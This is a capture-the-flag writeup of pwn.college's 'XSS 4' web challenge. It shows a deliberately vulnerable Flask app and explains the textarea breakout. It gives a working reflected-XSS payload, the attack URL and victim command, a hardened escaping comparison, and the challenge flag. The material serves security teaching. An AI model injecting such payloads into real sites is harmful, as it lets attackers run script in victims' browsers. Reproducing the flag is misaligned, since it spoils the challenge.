XSS 4 - Writeup
Writeup from Web Security
Challenge Information
- Category: Web Exploitation
- Challenge Name: XSS 4
- Platform: pwn.college
- Tags: XSS, Reflected, Textarea Injection, Script Injection, JavaScript, DOM
Description
We are given a Flask web app that reflects the msg query parameter into a <textarea> element. Our goal is to inject JavaScript into the rendered HTML page and trigger an alert box, which yields the flag.
Source Code

```python
#!/opt/pwn.college/python

import flask
import os

app = flask.Flask(__name__)


@app.route("/", methods=["GET"])
def challenge_get():
    # The msg query parameter is interpolated straight into the response body
    # with no escaping, so any markup it contains is rendered as markup.
    return f"""
        <html><body>
        <h1>pwnmsg ephemeral message service</h1>
        The message:
        <form>
        <textarea name=msg>{flask.request.args.get("msg", "Type your message here!")}</textarea>
        <input type=submit value="Make URL!">
        </form>
        </body></html>
    """


app.secret_key = os.urandom(8)
app.config["SERVER_NAME"] = f"challenge.localhost:80"
app.run("challenge.localhost", 80)
```
Vulnerability Analysis
The key vulnerability here lies in the way user input is directly embedded inside a <textarea> tag without any sanitization or escaping:
<textarea name=msg>{user-controlled-input}</textarea>
Because a <textarea> only ends at the first </textarea> the parser sees, input containing that closing tag ends the element early, and everything after it is parsed as ordinary HTML/JavaScript rather than as text.
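The unescaped rendering from the challenge beside an escaped version, as an added example that is not part of the writeup or the challenge code; `PROBE`, `breaks_out` and `textarea_body` are names chosen here, and the escaping falls back to the standard library's `html.escape` when `markupsafe` is not installed.

```python
import html

try:
    # markupsafe ships with Flask/Jinja2; its escape() is what Flask's
    # autoescaped templates use. Fall back to the stdlib if it is missing.
    from markupsafe import escape
except ImportError:
    escape = html.escape

# Constructed probe in the shape of the writeup's payload: it closes the
# textarea, adds a script element, then reopens a textarea.
PROBE = '</textarea><script>alert("x")</script><textarea>'


def render_vulnerable(msg: str) -> str:
    """The challenge's pattern: msg is interpolated into the HTML unescaped."""
    return f"<textarea name=msg>{msg}</textarea>"


def render_hardened(msg: str) -> str:
    """Same fragment, but < > & " ' become entities first, so the browser
    only ever sees text inside the textarea."""
    return f"<textarea name=msg>{escape(msg)}</textarea>"


def breaks_out(fragment: str) -> bool:
    """Hypothetical check: a second textarea close tag or any script start
    tag means the input left the textarea's text context."""
    lower = fragment.lower()
    return lower.count("</textarea>") != 1 or "<script" in lower


def textarea_body(fragment: str) -> str:
    """Return what sits between the opening tag and the final close tag."""
    start = fragment.index(">") + 1
    end = fragment.rindex("</textarea>")
    return fragment[start:end]


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("hardened", render_hardened)):
        out = render(PROBE)
        print(f"{name:10} breaks out: {breaks_out(out)}")
        print(f"           {out}")
```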
Exploit
By closing the existing <textarea> tag and inserting a <script> block, we can execute arbitrary JavaScript code in the victim's browser.
Payload:

```
</textarea><script>alert("PWNED")</script><textarea>
```
Full URL:

```
http://challenge.localhost/?msg=</textarea><script>alert("PWNED")</script><textarea>
```
Execution
We use the /challenge/victim command to simulate a visit by a vulnerable user or bot:
```
hacker@web-security~xss-4:~$ /challenge/victim 'http://challenge.localhost/?msg=</textarea><script>alert("PWNED")</script><textarea>'
```
This results in:
```
Visiting http://challenge.localhost/?msg=</textarea><script>alert("PWNED")</script><textarea>
Alert triggered! Your reward:
pwn.college{Ysj7zmjBRnYiY7FcGZ1v35gxDuU.QX1kzMzwSM0IzMyEzW}
```
Flag
pwn.college{Ysj7zmjBRnYiY7FcGZ1v35gxDuU.QX1kzMzwSM0IzMyEzW}